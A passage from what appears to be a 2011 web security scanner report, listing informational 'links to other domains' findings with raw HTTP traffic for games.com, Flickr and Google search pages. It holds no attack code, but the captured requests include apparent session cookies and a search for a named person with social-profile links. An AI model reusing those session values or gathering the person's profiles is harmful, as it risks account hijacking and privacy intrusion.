Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 13:06:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www131.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 1470

var b_txt = '';

// write the badge
   
   
                               b_txt+= '<td align="center" valign="center" style="padding:0" class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/ph
...[SNIP]...
<span style="position:absolute;left:-999em;top:-999em;visibility:hidden" class="flickr_badge_beacon"><img src="http://geo.yahoo.com/p?s=792600102&t=72fb4c3d82e1e2b081ceab63fe7a239c&r=http%3A%2F%2Fwww.tuaw.com%2Fhub%2Fapp-reviews&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>
...[SNIP]...

16.80. http://www.games.com/game/family-feud/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /game/family-feud/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.games.com/game/family-feud/?icid=maing-grid7%7Cmain5%7Cdl11%7Csec3_lnk1%7C60483
The response contains the following links to other domains:

Request

GET /game/family-feud/?icid=maing-grid7%7Cmain5%7Cdl11%7Csec3_lnk1%7C60483 HTTP/1.1
Host: www.games.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 00:59:42 GMT; Path=/
Content-Length: 72850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm294 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<!-- End OMNITURE --><link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/os/games/styles/default.css"/>
<link rel="shortcut icon" href="http://o.aolcdn.com/os/games/images/favicon.ico"/>
<link rel="canonical" href="http://www.games.com/game/family-feud/"/>
...[SNIP]...
<!-- Set Merge URL-->
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&amp;file=/games/scripts/default.min.js&amp;file=/header/js/jquery.globalheader-1.3.js&amp;file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js"></script>
...[SNIP]...
<!-- New BuzzFeed Code End -->


<link rel="image_src" href="http://o.aolcdn.com/ch_onlinegames/game-images/335/150x150"></head>
...[SNIP]...
<li><a href="http://www.aol.com/" title="<img class='branding' src='http://o.aolcdn.com/casualgames/images/1-logo-brand-aol.gif' alt='Aol.' title='Aol.' />" target = "_self"><img class='branding' src='http://o.aolcdn.com/casualgames/images/1-logo-brand-aol.gif' alt='Aol.' title='Aol.' /></a></li><li><a href="http://webmail.aol.com/?_AOLLOCAL=mail" title="Mail" target = "_self">Mail</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/" title="Huffington Post" target = "_self">Huffington Post</a>
...[SNIP]...
<li><a href="http://www.moviefone.com/" title="Movies" target = "_self">, Movies</a></li><li><a href="http://music.aol.com/" title="Music" target = "_self">, Music</a></li><li><a href="http://music.aol.com/radioguide/bb" title="Radio" target = "_self">, Radio</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<li><a href="http://help.aol.com/help/product/games_com/" title="Help" class = "help" target = "_self">Help</a></li><li><a href="http://m.aol.com/games/" title="Mobile" class = "help" target = "_self">Mobile</a>
...[SNIP]...
<li id="search-tab-Images"><a href="http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=" target="_blank" title="Images" onclick="return searchTarget('http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=', true, 'search-tab-Images');">Images</a></li>
<li id="search-tab-Local"><a href="http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=" target="_blank" title="Local" onclick="return searchTarget('http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=', true, 'search-tab-Local');">Local</a></li>
<li id="search-tab-News"><a href="http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=" target="_blank" title="News" onclick="return searchTarget('http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=', true, 'search-tab-News');">News</a></li>
<li id="search-tab-Video"><a href="http://video.aol.com/searchresults?query=" target="_blank" title="Video" onclick="return searchTarget('http://video.aol.com/searchresults?query=', true, 'search-tab-Video');">Video</a></li>
<li id="search-tab-Web"><a href="http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=" target="_blank" title="Web" onclick="return searchTarget('http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=', true, 'search-tab-Web');">Web</a>
...[SNIP]...
<li><a href="http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames" title="Cash Games" target = "_self">Cash Games</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<div class="img photo">
<img src="http://o.aolcdn.com/dims/GAME/5/150/150/60/http://o.aolcdn.com/ch_onlinegames/game-images/335/150x150" alt="Family Feud" title="Family Feud"/>
<form name="mod93_addNewGameRating" method="post" action="http://www.games.com/game/family-feud/?icid=maing-grid7%7cmain5%7cdl11%7csec3_lnk1%7c60483&" class="gameRating">
...[SNIP]...
<li class="download">
<a href="http://d.trymedia.com/d/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup.rga?curr_selected=USD" class="button">Download Trial</a>
...[SNIP]...
<li class="buy">
<a href="http://b.trymedia.com/b/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup?curr_selected=USD" class="button">Buy Now</a>
...[SNIP]...
<li class="cash"><a href="http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames&game_id=54" class="button">Cash Competition</a>
...[SNIP]...
<div class="tooltipBody"><img src="http://o.aolcdn.com/ch_onlinegames/rating-images/13" alt=""/>
<span class="label">
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aolcdn.com/dims/GAME/5/48/48/60/http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" border="0" alt="wi00000000089916 icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">wi00000000089916<img class="reviewerStatus" src="http://big.oscar.aol.com/wi00000000089916?on_url=http://www.aol.com/aim/gr/online.gif&amp;off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aimcdn.net/e/1/00052b000000bb" border="0" alt="mitchjohnny5 icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">mitchjohnny5<img class="reviewerStatus" src="http://big.oscar.aol.com/mitchjohnny5?on_url=http://www.aol.com/aim/gr/online.gif&amp;off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aolcdn.com/dims/GAME/5/48/48/60/http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" border="0" alt="gsixmoe icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">gsixmoe<img class="reviewerStatus" src="http://big.oscar.aol.com/gsixmoe?on_url=http://www.aol.com/aim/gr/online.gif&amp;off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aimcdn.net/e/1/00052b000004a7" border="0" alt="suzyscorpion icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">suzyscorpion<img class="reviewerStatus" src="http://big.oscar.aol.com/suzyscorpion?on_url=http://www.aol.com/aim/gr/online.gif&amp;off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<li class="singleReview"><img class="icon" src="http://o.aolcdn.com/dims/GAME/5/48/48/60/http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" border="0" alt="tb00000000089591 icon" hspace="0" vspace="0"/><a class="reportLink" href="mailto:TOSProfileReport@aol.com?subject=Games Reviews Complaint For http://www.games.com/game/family-feud/&amp;body=URL:%20http://www.games.com/game/family-feud/%0A%0AGame%2
...[SNIP]...
<div class="reviewer">tb00000000089591<img class="reviewerStatus" src="http://big.oscar.aol.com/tb00000000089591?on_url=http://www.aol.com/aim/gr/online.gif&amp;off_url=http://www.aol.com/aim/gr/offline.gif" border="0" alt="" hspace="0" vspace="0"/></div>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<h3><img src="http://o.aolcdn.com/os/games/images/modules/headers/PlayerCard" alt="PlayerCard"/></h3>
...[SNIP]...
<div class="profile">
           <img class="icon" src="http://o.aolcdn.com/os/games/destiny/images/defaultAvatar" alt=""/>
                   <span class="screenName">
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<span class="snsButtonContainer"><a href="https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=www.games.com&lang=en&locale=us&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.games.com%2Fgame%2Ffamily-feud%2F&offerId=gamescom-en-us" title="Sign In" class="snsButton signin">Sign In</a>
...[SNIP]...
<a href="/game/burger-shop/" title="Burger Shop" rel="nofollow"><img src="http://o.aolcdn.com/dims/GAME/5/298/178/60/http://o.aolcdn.com/ch_onlinegames/game-images/788/screenshot1" alt=""/></a>
...[SNIP]...
<a href="/game/slots-lounge/" title="Slots Lounge" rel="nofollow"><img src="http://o.aolcdn.com/dims/GAME/5/298/178/60/http://o.aolcdn.com/ch_onlinegames/game-images/809/screenshot1" alt=""/></a>
...[SNIP]...
<a href="/game/the-book-of-treasures/" title="The Book of Treasures" rel="nofollow"><img src="http://o.aolcdn.com/dims/GAME/5/298/178/60/http://o.aolcdn.com/ch_onlinegames/game-images/4097/screenshot1" alt=""/></a>
...[SNIP]...
<h2><img align="middle" style="margin:5px 5px" src="http://o.aolcdn.com/os/games/images/modules/headers/GamesHereAndThere" alt="Follow Games.com on Twitter or Facebook. Install the Games.com tool bar"></h2>
...[SNIP]...
<h3><iframe src="http://www.facebook.com/plugins/likebox.php?id=16327590002&amp;width=292&amp;connections=0&amp;stream=false&amp;header=false&amp;height=165" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:292px; height:65px;" allowTransparency="true"></iframe>
...[SNIP]...
<h3><img style="padding:7px; background:none; border:none;" src="http://o.aolcdn.com/os/games/images/logos/twitter" /><br>
       <span style="padding:7px;"><a href="http://twitter.com/games_aol">Follow us on Twitter!</a>
...[SNIP]...
<h3><img style="padding:7px; background:none; border:none;" src="http://o.aolcdn.com/os/games/images/modules/icons/gamesdotcom-toolbar"><br>
<span style="padding:7px;"><a href="http://toolbar.aol.com/games/download.html">Download the Games.com Toolbar</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<li id="footer-search-tab-Images"><a href="http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=" target="_blank" title="Images" onclick="return searchTargetFt('http://search.aol.com/aolcom/image?invocationType=gamesChannel&query=', true, 'footer-search-tab-Images');">Images</a></li>
<li id="footer-search-tab-Local"><a href="http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=" target="_blank" title="Local" onclick="return searchTargetFt('http://sbgw.search.aol.com/kw/exec?lookupType=11&sourceType=416&text=&q=', true, 'footer-search-tab-Local');">Local</a></li>
<li id="footer-search-tab-News"><a href="http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=" target="_blank" title="News" onclick="return searchTargetFt('http://search.aol.com/aolcom/news?invocationType=gamesChannel&query=', true, 'footer-search-tab-News');">News</a></li>
<li id="footer-search-tab-Video"><a href="http://video.aol.com/searchresults?query=" target="_blank" title="Video" onclick="return searchTargetFt('http://video.aol.com/searchresults?query=', true, 'footer-search-tab-Video');">Video</a></li>
<li id="footer-search-tab-Web"><a href="http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=" target="_blank" title="Web" onclick="return searchTargetFt('http://search.aol.com/aolcom/search?invocationType=gamesChannel&query=', true, 'footer-search-tab-Web');">Web</a>
...[SNIP]...
<li><a href="http://aol.worldwinner.com/cgi/welcome/21sie?portal=aolgames" title="Cash Games" target = "_self">Cash Games</a>
...[SNIP]...
<li><a href="http://kids.aol.com/games/online-games" title="Free Kids Games" target = "_self">Free Kids Games</a>
...[SNIP]...
<li><a href="http://www.popeater.com/" title="Celebrity News" target = "_self">Celebrity News</a>
...[SNIP]...
<li><a href="http://www.moviefone.com" title="Movies" target = "_self">Movies</a></li><li><a href="http://music.aol.com/" title="Music" target = "_self">Music</a></li><li><a href="http://television.aol.com/" title="TV" target = "_self">TV</a></li><li><a href="http://music.aol.com/radioguide/bb" title="Online Radio" target = "_self">Online Radio</a>
...[SNIP]...
<li><a href="http://www.kitchendaily.com/" title="Food" target = "_self">Food</a></li><li><a href="http://shopping.aol.com/" title="Shopping" target = "_self">Shopping</a></li><li><a href="http://music.aol.com/radioguide/bb/" title="Online Music" target = "_self">Online Music</a>
...[SNIP]...
<li><a href="http://www.aolhealth.com/" title="Health & Diet" target = "_self">Health & Diet</a>
...[SNIP]...
<li><a href="http://personals.aol.com/" title="Personals" target = "_self">Personals</a>
...[SNIP]...
<li><a href="http://shortcuts.com/?promo=0102239&ncid=aolsht00020000000033" title="Free Coupons" target = "_self">Free Coupons</a>
...[SNIP]...
<li><a href="http://www.mapquest.com/" title="MapQuest" target = "_self">MapQuest</a></li><li><a href="http://www.walletpop.com/" title="WalletPop" target = "_self">WalletPop</a></li><li><a href="http://bigdownload.com" title="PC Games Demo" target = "_self">PC Games Demo</a>
...[SNIP]...
<li><a href="http://gamezebo.com" title="Casual Games Reviews" target = "_self">Casual Games Reviews</a>
...[SNIP]...
<li><a href="http://CasualGaming.biz" title="Casual Games News" target = "_self">Casual Games News</a>
...[SNIP]...
<li><a href="http://advertising.aol.com/brands/gamescom" title="Advertise on Games.com" target = "_self">Advertise on Games.com</a>
...[SNIP]...
<li><a href="http://www.gameproducer.net/" title="GameProducer.net" target = "_self">GameProducer.net</a>
...[SNIP]...
<li><a href="http://www.free-games-flash.com/" title="Free Flash Games" target = "_self">Free Flash Games</a>
...[SNIP]...
<li><a href="http://www.aol.com/aolnetwork/aolcom_terms.html" title="Terms of Use" target = "_self">Terms of Use</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/mem_tos" title="Updated Terms of Service" target = "_self">Updated Terms of Service</a>
...[SNIP]...
<li><a href="http://www.aol.com/aolnetwork/aol_pp.html" title="Privacy Policy" target = "_self">Privacy Policy</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/mem_commitments" title="Updated Privacy Policy" target = "_self">Updated Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.aol.com/aolnetwork/trademarks.html" title="Trademarks" target = "_self">Trademarks</a>
...[SNIP]...
<!-- BEGIN: FEEDBACK LINK JS -->
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<!-- END: Global Games FootAppend -->
<script type="text/javascript" src="http://eatps.web.aol.com:9000/open_web_adhoc?subtype=7051&sid=GAMES&game=335"></script><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

16.81. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:45:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84171

<!doctype html> <head> <title>Bucky A Jordan - Google Search</title> <script>window.google={kEI:"YA_CTavYJIXUgQeEwdG4Dg",kEXPI:"17259,24472,25907,27147,28505,28514,28766,28887,29481,29509,29681
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Bucky+A+Jordan&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/people/Bucky-Jordan/100000824820783" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iS4bqymh6rMJ:www.facebook.com/people/Bucky-Jordan/100000824820783+Bucky+A+Jordan&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259" class=l onmousedown="return clk(this.href,'','','','2','','0CB8QFjAB')">Alexander <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:20exXcfehgMJ:www.facebook.com/people/Alexander-Bucky-Jordan/1242845259+Bucky+A+Jordan&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.myspace.com/buckstar61" class=l onmousedown="return clk(this.href,'','','','3','','0CCYQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tZjlH2n9wKEJ:www.myspace.com/buckstar61+Bucky+A+Jordan&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.scgolf.org/tournaments/2011/majors/srfourballaccepted.shtml" class=l onmousedown="return clk(this.href,'','','','4','','0CC0QFjAD')">Senior Four Ball Championship</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:42vLm4Ss1RAJ:www.scgolf.org/tournaments/2011/majors/srfourballaccepted.shtml+Bucky+A+Jordan&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://controlshift.aol.com/careers" class=l onmousedown="return clk(this.href,'','','','5','','0CDMQFjAE')">control shift : It&#39;s All About the Experience : AOL Design Blog</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wV5wS-n5DVIJ:controlshift.aol.com/careers+Bucky+A+Jordan&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://justjaredjr.buzznet.com/2009/12/14/jordan-pruitt-sings-christmas-carols-by-candlelight/" class=l onmousedown="return clk(this.href,'','','','6','','0CDoQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nzUV3ZppvDMJ:justjaredjr.buzznet.com/2009/12/14/jordan-pruitt-sings-christmas-carols-by-candlelight/+Bucky+A+Jordan&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CD8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://markmail.org/message/5wmsv36cbmj52zkm" class=l onmousedown="return clk(this.href,'','','','7','','0CEAQFjAG')">Software Engineer, Lumeta Corporation, Somerset NJ - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5PrC1rN5hc0J:markmail.org/message/5wmsv36cbmj52zkm+Bucky+A+Jordan&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.famegame.com/people/Jordan_Bucky" class=l onmousedown="return clk(this.href,'','','','8','','0CEYQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WQN5FNq5ctEJ:www.famegame.com/people/Jordan_Bucky+Bucky+A+Jordan&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mylife.com/melvinbuckyjordan" class=l onmousedown="return clk(this.href,'','','','9','','0CE0QFjAI')">Melvin <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ccKIO6Fyz5gJ:www.mylife.com/melvinbuckyjordan+Bucky+A+Jordan&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFIQIDAI')">Cached</a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=EHH9BAvpgvU" class=l onmousedown="return clk(this.href,'','1185006370796700405','','10','','0CFMQtwIwCQ')">Dance Wit Me/ By <em>
...[SNIP]...

16.82. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?sa=t&source=web&cd=7&ved=0CEEQFjAG&url=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNGok1iKDISUUQCJ9SwqmC59QUUOgQ
The response contains the following link to another domain:
  • http://www.facebook.com/people/Bucky-Jordan/100000824820783

Request

GET /url?sa=t&source=web&cd=7&ved=0CEEQFjAG&url=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNGok1iKDISUUQCJ9SwqmC59QUUOgQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 02:50:57 GMT
Server: gws
Content-Length: 256
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.facebook.com/people/Bucky-Jordan/100000824820783">here</A>
...[SNIP]...

16.83. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBkQFjAA&url=http%3A%2F%2Fcontrolshift.aol.com%2Fcareers&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNHVqxamBeAZki9HHAluDul0ksF_Rg
The response contains the following link to another domain:
  • http://controlshift.aol.com/careers

Request

GET /url?sa=t&source=web&cd=1&ved=0CBkQFjAA&url=http%3A%2F%2Fcontrolshift.aol.com%2Fcareers&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNHVqxamBeAZki9HHAluDul0ksF_Rg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
